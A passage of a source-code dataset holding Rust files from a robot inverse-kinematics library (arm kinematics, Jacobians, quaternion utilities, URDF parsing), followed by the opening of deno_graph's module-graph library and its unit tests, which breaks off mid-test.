use nalgebra::{Vector3, Vector6, UnitQuaternion, Unit, Matrix, DMatrix, DVector, ArrayStorage};
use num::clamp;
#[derive(Clone, Debug)]
pub struct Arm {
pub axis_types: Vec<String>,
pub displacements: Vec<nalgebra::Vector3<f64>>,
pub rot_offset_quats: Vec<nalgebra::UnitQuaternion<f64>>,
pub joint_types: Vec<String>,
pub num_dof: usize,
pub out_positions: Vec<nalgebra::Vector3<f64>>,
pub out_rot_quats: Vec<nalgebra::UnitQuaternion<f64>>,
__do_rot_offset: Vec<bool>,
__is_prismatic: Vec<bool>,
__is_revolute_or_continuous: Vec<bool>,
__is_fixed: Vec<bool>,
__is_x: Vec<bool>,
__is_y: Vec<bool>,
__is_z: Vec<bool>,
__is_neg_x: Vec<bool>,
__is_neg_y: Vec<bool>,
__is_neg_z: Vec<bool>,
__aux_matrix: nalgebra::Matrix3<f64>
}
impl Arm{
pub fn init(axis_types: Vec<String>,
disp_offsets: Vec<nalgebra::Vector3<f64>>,
rot_offsets: Vec<UnitQuaternion<f64>>, joint_types: Vec<String>) -> Arm {
let num_dof = axis_types.len();
let mut __do_rot_offset: Vec<bool> = Vec::new();
for i in 0..rot_offsets.len() {
if rot_offsets[i][0] == 0.0 && rot_offsets[i][1] == 0.0 && rot_offsets[i][2] == 0.0 {
__do_rot_offset.push(false);
} else {
__do_rot_offset.push(true);
}
}
let mut displacements: Vec<nalgebra::Vector3<f64>> = Vec::new();
for i in 0..disp_offsets.len() {
displacements.push(disp_offsets[i].clone());
}
let mut rot_offset_quats: Vec<nalgebra::UnitQuaternion<f64>> = Vec::new();
for i in 0..rot_offsets.len() {
rot_offset_quats.push(rot_offsets[i]);
}
let mut out_positions: Vec<nalgebra::Vector3<f64>> = Vec::new();
let mut out_rot_quats: Vec<nalgebra::UnitQuaternion<f64>> = Vec::new();
for i in 0..rot_offsets.len() {
out_positions.push(nalgebra::Vector3::new(0.,0.,0.));
out_rot_quats.push(nalgebra::UnitQuaternion::identity());
}
let mut __is_prismatic: Vec<bool> = Vec::new();
let mut __is_revolute_or_continuous: Vec<bool> = Vec::new();
let mut __is_fixed: Vec<bool> = Vec::new();
for i in 0..joint_types.len() {
if joint_types[i] == String::from("prismatic") {
__is_prismatic.push(true);
__is_revolute_or_continuous.push(false);
__is_fixed.push(false);
}
else if joint_types[i] == String::from("continuous") || joint_types[i] == String::from("revolute") {
__is_prismatic.push(false);
__is_revolute_or_continuous.push(true);
__is_fixed.push(false);
}
else if joint_types[i] == String::from("fixed") {
__is_prismatic.push(false);
__is_revolute_or_continuous.push(false);
__is_fixed.push(true);
}
}
let __aux_matrix: nalgebra::Matrix3<f64> = nalgebra::Matrix3::identity();
let mut __is_x: Vec<bool> = Vec::new();
let mut __is_y: Vec<bool> = Vec::new();
let mut __is_z: Vec<bool> = Vec::new();
let mut __is_neg_x: Vec<bool> = Vec::new();
let mut __is_neg_y: Vec<bool> = Vec::new();
let mut __is_neg_z: Vec<bool> = Vec::new();
for i in 0..axis_types.len() {
__is_x.push(false);
__is_y.push(false);
__is_z.push(false);
__is_neg_x.push(false);
__is_neg_y.push(false);
__is_neg_z.push(false);
if axis_types[i] == String::from("X") || axis_types[i] == String::from("x") {
__is_x[i] = true;
}
else if axis_types[i] == String::from("X") || axis_types[i] == String::from("x") {
__is_x[i] = true;
}
else if axis_types[i] == String::from("Y") || axis_types[i] == String::from("y") {
__is_y[i] = true;
}
else if axis_types[i] == String::from("Z") || axis_types[i] == String::from("z") {
__is_z[i] = true;
}
else if axis_types[i] == String::from("-x"){
__is_neg_x[i] = true;
}
else if axis_types[i] == String::from("-y"){
__is_neg_y[i] = true;
}
else if axis_types[i] == String::from("-z"){
__is_neg_z[i] = true;
}
}
// println!("displacements: {:?}", displacements);
// println!("axis_types: {:?}", axis_types);
// println!("__is_revolute_or_continuous: {:?}", __is_revolute_or_continuous);
// println!("__do_rot_offset: {:?}", __do_rot_offset);
// println!("rot_offset_quats: {:?}", rot_offset_quats);
// println!("joint_types: {:?}", joint_types);
Arm{axis_types, displacements, rot_offset_quats,
joint_types, num_dof, out_positions, out_rot_quats, __do_rot_offset, __is_prismatic,
__is_revolute_or_continuous, __is_fixed, __is_x, __is_y, __is_z, __is_neg_x, __is_neg_y,
__is_neg_z, __aux_matrix}
}
pub fn get_frames_immutable(&self, x: &[f64]) -> (Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>) {
let mut out_positions: Vec<nalgebra::Vector3<f64>> = Vec::new();
let mut out_rot_quats: Vec<nalgebra::UnitQuaternion<f64>> = Vec::new();
let mut pt: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.,0.,0.);
let mut rot_quat = nalgebra::UnitQuaternion::identity();
out_positions.push(pt);
out_rot_quats.push(rot_quat);
let mut joint_idx: usize = 0;
for i in 0..self.displacements.len() {
if self.__is_revolute_or_continuous[i] {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(joint_val);
} else if self.__is_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(joint_val);
} else if self.__is_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(joint_val);
} else if self.__is_neg_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(-joint_val);
} else if self.__is_neg_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(-joint_val);
} else if self.__is_neg_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(-joint_val);
}
out_positions.push(pt.clone());
out_rot_quats.push(rot_quat.clone());
joint_idx += 1;
}
else if self.__is_prismatic[i] {
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(joint_val, 0., 0.);
} else if self.__is_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., joint_val, 0.);
} else if self.__is_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., joint_val);
} else if self.__is_neg_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(-joint_val, 0., 0.);
} else if self.__is_neg_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., -joint_val, 0.);
} else if self.__is_neg_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., -joint_val);
}
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
out_positions.push(pt.clone());
out_rot_quats.push(rot_quat.clone());
joint_idx += 1;
}
else {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
out_positions.push(pt.clone());
out_rot_quats.push(rot_quat.clone());
}
}
out_rot_quats.push(rot_quat.clone());
(out_positions, out_rot_quats)
}
pub fn get_jacobian_immutable(&self, x: &[f64]) -> DMatrix<f64> {
let (joint_positions, joint_rot_quats) = self.get_frames_immutable(x);
let ee_position = joint_positions[joint_positions.len()-1];
let pos_x: nalgebra::Vector3<f64> = nalgebra::Vector3::new(1.0, 0.0, 0.0);
let pos_y: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, 1.0, 0.0);
let pos_z: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, 0.0, 1.0);
let neg_x: nalgebra::Vector3<f64> = nalgebra::Vector3::new(-1.0, 0.0, 0.0);
let neg_y: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, -1.0, 0.0);
let neg_z: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.0, 0.0, -1.0);
let mut disp: Vector3<f64> = Vector3::new(0.0, 0.0, 0.0);
let mut p_axis: Vector3<f64> = Vector3::new(0.0, 0.0, 0.0);
let mut joint_idx: usize = 0;
let mut jacobian: DMatrix<f64> = DMatrix::identity(6, x.len());
for i in 1..self.displacements.len() {
if self.__is_revolute_or_continuous[i-1] {
disp = ee_position - joint_positions[i];
if self.__is_x[joint_idx] {
p_axis = joint_rot_quats[i] * pos_x
} else if self.__is_y[joint_idx] {
p_axis = joint_rot_quats[i] * pos_y
} else if self.__is_z[joint_idx] {
p_axis = joint_rot_quats[i] * pos_z
} else if self.__is_neg_x[joint_idx] {
p_axis = joint_rot_quats[i] * neg_x
} else if self.__is_neg_y[joint_idx] {
p_axis = joint_rot_quats[i] * neg_y
} else if self.__is_neg_z[joint_idx] {
p_axis = joint_rot_quats[i] * neg_z
}
let linear = p_axis.cross(&disp);
jacobian.set_column(joint_idx, & Vector6::new( linear.x, linear.y, linear.z,
p_axis.x, p_axis.y, p_axis.z ));
joint_idx += 1;
}
}
jacobian
}
pub fn get_manipulability_immutable(&self, x: &[f64]) -> f64 {
if self.num_dof < 6 {
return 0.0;
}
let jacobian = self.get_jacobian_immutable(x);
let mut d = (jacobian.clone() * jacobian.transpose()).determinant();
d = clamp(d, 0.0, 1.0);
d.sqrt()
}
pub fn get_ee_pos_and_quat_immutable(&self, x: &[f64]) -> (nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>) {
let mut pt: nalgebra::Vector3<f64> = nalgebra::Vector3::new(0.,0.,0.);
let mut rot_quat = nalgebra::UnitQuaternion::identity();
let mut joint_idx: usize = 0;
for i in 0..self.displacements.len() {
if self.__is_revolute_or_continuous[i] {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(joint_val);
} else if self.__is_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(joint_val);
} else if self.__is_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(joint_val);
} else if self.__is_neg_x[joint_idx] {
rot_quat = rot_quat * get_quat_x(-joint_val);
} else if self.__is_neg_y[joint_idx] {
rot_quat = rot_quat * get_quat_y(-joint_val);
} else if self.__is_neg_z[joint_idx] {
rot_quat = rot_quat * get_quat_z(-joint_val);
}
joint_idx += 1;
}
else if self.__is_prismatic[i] {
let joint_val = x[joint_idx];
if self.__is_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(joint_val, 0., 0.);
} else if self.__is_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., joint_val, 0.);
} else if self.__is_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., joint_val);
} else if self.__is_neg_x[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(-joint_val, 0., 0.);
} else if self.__is_neg_y[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., -joint_val, 0.);
} else if self.__is_neg_z[joint_idx] {
pt = rot_quat * self.displacements[i] + pt + nalgebra::Vector3::new(0., 0., -joint_val);
}
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
joint_idx += 1;
}
else {
pt = rot_quat * self.displacements[i] + pt;
if self.__do_rot_offset[i] {
rot_quat = rot_quat * self.rot_offset_quats[i];
}
}
}
(pt, rot_quat)
}
}
pub fn get_rot_x(val: f64) -> nalgebra::Matrix3<f64> {
nalgebra::Matrix3::new(1., 0., 0., 0., val.cos(), -val.sin(), 0.0, val.sin(), val.cos())
}
pub fn get_rot_y(val: f64) -> nalgebra::Matrix3<f64> {
nalgebra::Matrix3::new(val.cos(), 0.0, val.sin(), 0., 1., 0., -val.sin(), 0., val.cos())
}
pub fn get_rot_z(val: f64) -> nalgebra::Matrix3<f64> {
nalgebra::Matrix3::new(val.cos(), -val.sin(), 0., val.sin(), val.cos(), 0., 0., 0., 1.)
}
pub fn get_neg_rot_x(val: f64) -> nalgebra::Matrix3<f64> {
get_rot_x(-val)
}
pub fn get_neg_rot_y(val: f64) -> nalgebra::Matrix3<f64> {
get_rot_y(-val)
}
pub fn get_neg_rot_z(val: f64) -> nalgebra::Matrix3<f64> {
get_rot_z(-val)
}
pub fn get_quat_x(val: f64) -> nalgebra::UnitQuaternion<f64> {
UnitQuaternion::from_euler_angles(val, 0., 0.)
}
pub fn get_quat_y(val: f64) -> nalgebra::UnitQuaternion<f64> {
UnitQuaternion::from_euler_angles(0., val, 0.)
}
pub fn get_quat_z(val: f64) -> nalgebra::UnitQuaternion<f64> {
UnitQuaternion::from_euler_angles(0., 0., val)
}
pub fn get_neg_quat_x(val: f64) -> nalgebra::UnitQuaternion<f64> {
get_quat_x(-val)
}
pub fn get_neg_quat_y(val: f64) -> nalgebra::UnitQuaternion<f64> {
get_quat_y(-val)
}
pub fn get_neg_quat_z(val: f64) -> nalgebra::UnitQuaternion<f64> {
get_quat_z(-val)
}
pub fn euler_triple_to_3x3(t: &Vec<f64>) -> nalgebra::Matrix3<f64>{
let xm = get_rot_x(t[0]);
let ym = get_rot_y(t[1]);
let zm = get_rot_z(t[2]);
let zy = zm*ym;
zy*xm
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/spacetime/mod.rs | src/spacetime/mod.rs | pub mod robot;
pub mod arm; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/spacetime/robot.rs | src/spacetime/robot.rs | use crate::spacetime::arm;
use nalgebra;
use urdf_rs;
#[derive(Clone, Debug)]
pub struct Robot {
pub arms: Vec<arm::Arm>,
pub num_chains: usize,
pub num_dofs: usize,
pub chain_lengths: Vec<usize>,
pub lower_joint_limits: Vec<f64>,
pub upper_joint_limits: Vec<f64>
}
impl Robot {
pub fn from_urdf(urdf: &str, base_links: &[String], ee_links: &[String]) -> Self {
// let chain = k::Chain::<f64>::from_urdf_file(urdf).unwrap();
let description : urdf_rs::Robot = urdf_rs::read_from_string(urdf).unwrap();
let chain: k::Chain<f64> = k::Chain::from(description.clone());
let mut arms: Vec<arm::Arm> = Vec::new();
let num_chains = base_links.len();
let mut chain_lengths = Vec::new();
let mut num_dofs = 0;
let mut lower_joint_limits = Vec::new();
let mut upper_joint_limits = Vec::new();
for i in 0..num_chains {
let base_link = chain.find_link(base_links[i].as_str()).unwrap();
let ee_link = chain.find_link(ee_links[i].as_str()).unwrap();
let serial_chain = k::SerialChain::from_end_to_root(&ee_link, &base_link);
let mut axis_types: Vec<String> = Vec::new();
let mut joint_types: Vec<String> = Vec::new();
let disp_offset = nalgebra::Vector3::new(0.0, 0.0, 0.0);
let mut displacements = Vec::new();
let mut rot_offsets = Vec::new();
let mut first_link: bool = true;
serial_chain.iter().for_each(|node| {
let joint = node.joint();
if first_link {
first_link = false;
return
} else {
match joint.joint_type {
k::JointType::Fixed => {
joint_types.push("fixed".to_string());
},
k::JointType::Rotational { axis } => {
if axis[0] == 1.0 {
axis_types.push("x".to_string());
} else if axis[1] == 1.0 {
axis_types.push("y".to_string());
} else if axis[2] == 1.0 {
axis_types.push("z".to_string());
} else if axis[0] == -1.0 {
axis_types.push("-x".to_string());
} else if axis[1] == -1.0 {
axis_types.push("-y".to_string());
} else if axis[2] == -1.0 {
axis_types.push("-z".to_string());
}
if joint.limits.is_none() {
joint_types.push("continuous".to_string());
lower_joint_limits.push(-999.0);
upper_joint_limits.push(999.0);
} else {
joint_types.push("revolute".to_string());
lower_joint_limits.push(joint.limits.unwrap().min);
upper_joint_limits.push(joint.limits.unwrap().max);
}
},
k::JointType::Linear { axis } => {
if axis[0] == 1.0 {
axis_types.push("x".to_string());
} else if axis[1] == 1.0 {
axis_types.push("y".to_string());
} else if axis[2] == 1.0 {
axis_types.push("z".to_string());
} else if axis[0] == -1.0 {
axis_types.push("-x".to_string());
} else if axis[1] == -1.0 {
axis_types.push("-y".to_string());
} else if axis[2] == -1.0 {
axis_types.push("-z".to_string());
}
joint_types.push("prismatic".to_string());
lower_joint_limits.push(joint.limits.unwrap().min);
upper_joint_limits.push(joint.limits.unwrap().max);
}
}
}
displacements.push(joint.origin().translation.vector);
rot_offsets.push(joint.origin().rotation);
});
let arm: arm::Arm = arm::Arm::init(axis_types.clone(), displacements.clone(),
rot_offsets.clone(), joint_types.clone());
arms.push(arm);
chain_lengths.push(axis_types.len() as usize);
num_dofs += axis_types.len();
}
Robot{arms, num_chains, chain_lengths, num_dofs, lower_joint_limits, upper_joint_limits}
}
pub fn get_frames_immutable(&self, x: &[f64]) -> Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)> {
let mut out: Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)> = Vec::new();
let mut l = 0;
let mut r = 0;
for i in 0..self.num_chains {
r += self.chain_lengths[i];
out.push( self.arms[i].get_frames_immutable( &x[l..r] ) );
l = r;
}
out
}
pub fn get_manipulability_immutable(&self, x: &[f64]) -> f64 {
let mut out = 0.0;
let mut l = 0;
let mut r = 0;
for i in 0..self.num_chains {
r += self.chain_lengths[i];
out += self.arms[i].get_manipulability_immutable( &x[l..r] );
l = r;
}
out
}
pub fn get_ee_pos_and_quat_immutable(&self, x: &[f64]) -> Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)> {
let mut out: Vec<(nalgebra::Vector3<f64>, nalgebra::UnitQuaternion<f64>)> = Vec::new();
let mut l = 0;
let mut r = 0;
for i in 0..self.num_chains {
r += self.chain_lengths[i];
out.push( self.arms[i].get_ee_pos_and_quat_immutable( &x[l..r] ));
l = r;
}
out
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/utils_rust/transformations.rs | src/utils_rust/transformations.rs | use nalgebra::{Vector3, UnitQuaternion, Quaternion, Vector4};
pub fn quaternion_log(q: UnitQuaternion<f64>) -> Vector3<f64> {
let mut out_vec: Vector3<f64> = Vector3::new(q.i, q.j, q.k);
if q.w.abs() < 1.0 {
let a = q.w.acos();
let sina = a.sin();
if sina.abs() >= 0.005 {
let c = a / sina;
out_vec *= c;
}
}
out_vec
}
pub fn quaternion_exp(v: Vector3<f64>) -> UnitQuaternion<f64> {
let mut qv: Vector4<f64> = Vector4::new(1.0, v[0], v[1], v[2]);
let a = qv.norm();
let sina = a.sin();
if sina.abs() >= 0.005 {
let c = sina/a;
qv *= c;
}
UnitQuaternion::from_quaternion(Quaternion::new(a.cos(), qv[1], qv[2], qv[3]))
}
pub fn quaternion_disp(q: UnitQuaternion<f64>, q_prime: UnitQuaternion<f64>) -> Vector3<f64> {
quaternion_log( q.inverse()*q_prime )
}
pub fn quaternion_dispQ(q: UnitQuaternion<f64>, q_prime: UnitQuaternion<f64>) -> UnitQuaternion<f64> {
q.inverse()*q_prime
}
pub fn angle_between_quaternion(q: UnitQuaternion<f64>, q_prime: UnitQuaternion<f64>) -> f64 {
quaternion_disp(q, q_prime).norm() * 2.0
}
pub fn quaternion_from_angleaxis(angle: f64, axis: Vector3<f64>) -> UnitQuaternion<f64> {
let a = angle * 2.0;
let axis_len = axis.norm();
quaternion_exp( axis * (a / axis_len))
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/utils_rust/file_utils.rs | src/utils_rust/file_utils.rs | use std::env;
use std::fs::File;
use std::io::prelude::*;
use std::fs::read_dir;
use path_slash::PathBufExt;
pub fn get_path_to_src() -> String {
let path = env::current_dir().unwrap();
let s = path.to_slash().unwrap();
let s1 = String::from(s);
let path_to_src = s1 + "/";
path_to_src
} | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/utils_rust/mod.rs | src/utils_rust/mod.rs | pub mod transformations;
pub mod file_utils; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/bin/relaxed_ik_bin.rs | src/bin/relaxed_ik_bin.rs | extern crate relaxed_ik_lib;
use relaxed_ik_lib::relaxed_ik;
use nalgebra::{Vector3, UnitQuaternion, Quaternion};
use std::{io, thread, time};
use crate::relaxed_ik_lib::utils_rust::file_utils::{*};
fn main() {
// initilize relaxed ik
let path_to_src = get_path_to_src();
let default_path_to_setting = path_to_src + "configs/settings.yaml";
let mut relaxed_ik = relaxed_ik::RelaxedIK::load_settings(default_path_to_setting.as_str());
for i in 0..10{
for j in 0..relaxed_ik.vars.robot.num_chains {
// gradually move along the y axis
relaxed_ik.vars.goal_positions[j] += Vector3::new(0.0, 0.01, 0.0);
}
let x = relaxed_ik.solve();
println!("Joint solutions: {:?}", x);
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/lib.rs | src/lib.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![deny(clippy::print_stderr)]
#![deny(clippy::print_stdout)]
#![deny(clippy::unused_async)]
#![deny(clippy::unnecessary_wraps)]
pub mod analysis;
#[cfg(feature = "swc")]
pub mod ast;
mod collections;
mod graph;
mod jsr;
mod module_specifier;
mod rt;
#[cfg(feature = "symbols")]
pub mod symbols;
#[cfg(feature = "fast_check")]
pub mod fast_check;
pub mod packages;
pub mod source;
use source::FileSystem;
use source::JsrUrlProvider;
use source::Resolver;
use std::collections::HashMap;
use std::sync::Arc;
use std::time::SystemTime;
pub use deno_media_type::MediaType;
#[cfg(feature = "fast_check")]
pub use graph::BuildFastCheckTypeGraphOptions;
pub use graph::BuildOptions;
pub use graph::CheckJsOption;
pub use graph::CheckJsResolver;
pub use graph::Dependency;
pub use graph::ExternalModule;
#[cfg(feature = "fast_check")]
pub use graph::FastCheckTypeModule;
#[cfg(feature = "fast_check")]
pub use graph::FastCheckTypeModuleSlot;
pub use graph::FillFromLockfileOptions;
pub use graph::GraphImport;
pub use graph::GraphKind;
pub use graph::Import;
pub use graph::ImportKind;
pub use graph::JsModule;
pub use graph::JsonModule;
pub use graph::JsrLoadError;
pub use graph::JsrPackageReqNotFoundError;
pub use graph::Module;
pub use graph::ModuleEntryRef;
pub use graph::ModuleError;
pub use graph::ModuleErrorKind;
pub use graph::ModuleGraph;
pub use graph::ModuleGraphError;
pub use graph::ModuleLoadError;
pub use graph::ModuleTextSource;
pub use graph::NpmLoadError;
pub use graph::NpmModule;
pub use graph::Position;
pub use graph::PositionRange;
pub use graph::Range;
pub use graph::Resolution;
pub use graph::ResolutionError;
pub use graph::ResolutionResolved;
pub use graph::TypesDependency;
pub use graph::WalkOptions;
pub use graph::WasmModule;
#[cfg(feature = "fast_check")]
pub use graph::WorkspaceFastCheckOption;
pub use graph::WorkspaceMember;
pub use jsr::JsrMetadataStore;
pub use module_specifier::ModuleSpecifier;
pub use module_specifier::SpecifierError;
pub use module_specifier::resolve_import;
pub use rt::Executor;
pub use source::NpmResolvePkgReqsResult;
use self::analysis::ModuleAnalyzer;
/// Additional import that should be brought into the scope of
/// the module graph to add to the graph's "imports". This may
/// be extra modules such as TypeScript's "types" option or JSX
/// runtime types.
#[derive(Debug, Clone)]
pub struct ReferrerImports {
/// The referrer to resolve the imports from.
pub referrer: ModuleSpecifier,
/// Specifiers relative to the referrer to resolve.
pub imports: Vec<String>,
}
pub struct ParseModuleOptions<'a> {
pub graph_kind: GraphKind,
pub specifier: ModuleSpecifier,
pub maybe_headers: Option<HashMap<String, String>>,
pub mtime: Option<SystemTime>,
pub content: Arc<[u8]>,
pub file_system: &'a FileSystem,
pub jsr_url_provider: &'a dyn JsrUrlProvider,
pub maybe_resolver: Option<&'a dyn Resolver>,
pub module_analyzer: &'a dyn ModuleAnalyzer,
}
/// Parse an individual module, returning the module as a result, otherwise
/// erroring with a module graph error.
#[allow(clippy::result_large_err)]
pub async fn parse_module(
options: ParseModuleOptions<'_>,
) -> Result<Module, ModuleError> {
let module_source_and_info = graph::parse_module_source_and_info(
options.module_analyzer,
graph::ParseModuleAndSourceInfoOptions {
specifier: options.specifier,
maybe_headers: options.maybe_headers,
mtime: options.mtime,
content: options.content,
maybe_attribute_type: None,
maybe_referrer: None,
maybe_source_phase_referrer: None,
is_root: true,
is_dynamic_branch: false,
},
)
.await?;
let module = graph::parse_module(
options.file_system,
options.jsr_url_provider,
options.maybe_resolver,
graph::ParseModuleOptions {
graph_kind: options.graph_kind,
module_source_and_info,
},
);
Ok(module)
}
#[cfg(feature = "swc")]
pub struct ParseModuleFromAstOptions<'a> {
pub graph_kind: GraphKind,
pub specifier: ModuleSpecifier,
pub maybe_headers: Option<&'a HashMap<String, String>>,
pub mtime: Option<SystemTime>,
pub parsed_source: &'a deno_ast::ParsedSource,
pub file_system: &'a FileSystem,
pub jsr_url_provider: &'a dyn JsrUrlProvider,
pub maybe_resolver: Option<&'a dyn Resolver>,
}
/// Parse an individual module from an AST, returning the module.
#[cfg(feature = "swc")]
pub fn parse_module_from_ast(options: ParseModuleFromAstOptions) -> JsModule {
graph::parse_js_module_from_module_info(
options.graph_kind,
options.specifier,
options.parsed_source.media_type(),
options.maybe_headers,
ast::ParserModuleAnalyzer::module_info(options.parsed_source),
options.mtime,
ModuleTextSource::new_unknown(options.parsed_source.text().clone()),
options.file_system,
options.jsr_url_provider,
options.maybe_resolver,
)
}
#[cfg(test)]
mod tests {
use crate::graph::Import;
use crate::graph::ImportKind;
use crate::graph::PositionRange;
use crate::graph::ResolutionResolved;
use crate::source::NullFileSystem;
use crate::source::ResolutionKind;
use self::graph::CheckJsOption;
use super::*;
use deno_error::JsErrorBox;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use indexmap::IndexMap;
use indexmap::IndexSet;
use parking_lot::Mutex;
use pretty_assertions::assert_eq;
use serde_json::json;
use source::CacheInfo;
use source::DEFAULT_JSX_IMPORT_SOURCE_MODULE;
use source::MemoryLoader;
use source::ResolutionMode;
use source::Source;
use source::tests::MockResolver;
use std::collections::BTreeMap;
type Sources<'a> = Vec<(&'a str, Source<&'a str, &'a str>)>;
fn setup(
sources: Sources,
cache_info: Vec<(&str, CacheInfo)>,
) -> MemoryLoader {
MemoryLoader::new(sources, cache_info)
}
#[tokio::test]
async fn test_build_graph() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as b from "./test02.ts";"#,
},
),
(
"file:///a/test02.ts",
Source::Module {
specifier: "file:///a/test02.ts",
maybe_headers: None,
content: r#"export const b = "b";"#,
},
),
],
vec![],
);
let root_specifier =
ModuleSpecifier::parse("file:///a/test01.ts").expect("bad url");
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
vec![root_specifier.clone()],
Default::default(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 2);
assert_eq!(graph.roots, IndexSet::from([root_specifier.clone()]));
assert!(graph.contains(&root_specifier));
assert!(
!graph.contains(&ModuleSpecifier::parse("file:///a/test03.ts").unwrap())
);
let module = graph
.module_slots
.get(&root_specifier)
.unwrap()
.module()
.unwrap()
.js()
.unwrap();
assert_eq!(module.dependencies.len(), 1);
let maybe_dependency = module.dependencies.get("./test02.ts");
assert!(maybe_dependency.is_some());
let dependency_specifier =
ModuleSpecifier::parse("file:///a/test02.ts").unwrap();
let dependency = maybe_dependency.unwrap();
assert!(!dependency.is_dynamic);
assert_eq!(
dependency.maybe_code.ok().unwrap().specifier,
dependency_specifier
);
assert_eq!(dependency.maybe_type, Resolution::None);
let maybe_dep_module_slot = graph.get(&dependency_specifier);
assert!(maybe_dep_module_slot.is_some());
}
#[tokio::test]
async fn test_build_graph_multiple_roots() {
let loader = setup(
vec![
(
"file:///a/test01.ts",
Source::Module {
specifier: "file:///a/test01.ts",
maybe_headers: None,
content: r#"import * as b from "./test02.ts";"#,
},
),
(
"file:///a/test02.ts",
Source::Module {
specifier: "file:///a/test02.ts",
maybe_headers: None,
content: r#"export const b = "b";"#,
},
),
(
"https://example.com/a.ts",
Source::Module {
specifier: "https://example.com/a.ts",
maybe_headers: None,
content: r#"import * as c from "./c.ts";"#,
},
),
(
"https://example.com/c.ts",
Source::Module {
specifier: "https://example.com/c.ts",
maybe_headers: None,
content: r#"export const c = "c";"#,
},
),
],
vec![],
);
let roots = IndexSet::from([
ModuleSpecifier::parse("file:///a/test01.ts").unwrap(),
ModuleSpecifier::parse("https://example.com/a.ts").unwrap(),
]);
let mut graph = ModuleGraph::new(GraphKind::All);
graph
.build(
roots.iter().cloned().collect(),
Vec::new(),
&loader,
Default::default(),
)
.await;
assert_eq!(graph.module_slots.len(), 4);
assert_eq!(graph.roots, roots);
assert!(
graph.contains(&ModuleSpecifier::parse("file:///a/test01.ts").unwrap())
);
assert!(
